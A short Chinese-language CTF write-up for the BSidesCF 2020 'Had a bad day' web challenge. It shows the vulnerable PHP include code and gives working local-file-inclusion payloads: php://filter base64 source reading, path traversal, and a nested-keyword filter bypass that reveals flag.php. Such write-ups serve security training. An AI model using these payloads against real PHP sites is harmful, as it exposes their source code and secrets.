web第40题
[BSidesCF 2020]Had a bad day
打开靶场:
点击链接
发现有参数传递。考虑命令执行和sql注入的可能
尝试使用php://filter读取文件
原理介绍:php://filter 的使用
尝试读取index.php。发现报错
php://filter/read=convert.base64-encode/resource=index.php
根据提示信息,可能自动给文件加上了.php后缀,去掉自己写的文件后缀,再次尝试:
得到base64加密后的index.php文件的源码
解码得到index.php的源码:
<?php
$file = $_GET['category'];
if(isset($file))
{
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
include ($file . '.php');
}
else{
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>
代码审计:
strpos() 函数查找字符串在另一字符串中第一次出现的位置(区分大小写)
就是说category参数的值必须包含woofers或者meowers或者index,否则不能读取
尝试payload:
?category=woofers/../flag
…/代表上一层目录,这样写后include会返回woofers的同级目录将flag.php文件包含进来
发现提示,说明flag.php被包含进来了
经过了解,发现php://filter中可以嵌套一层woofers用来绕过检测并且不会影响读取,payload:
?category=php://filter/read=convert.base64-encode/woofers/resource=flag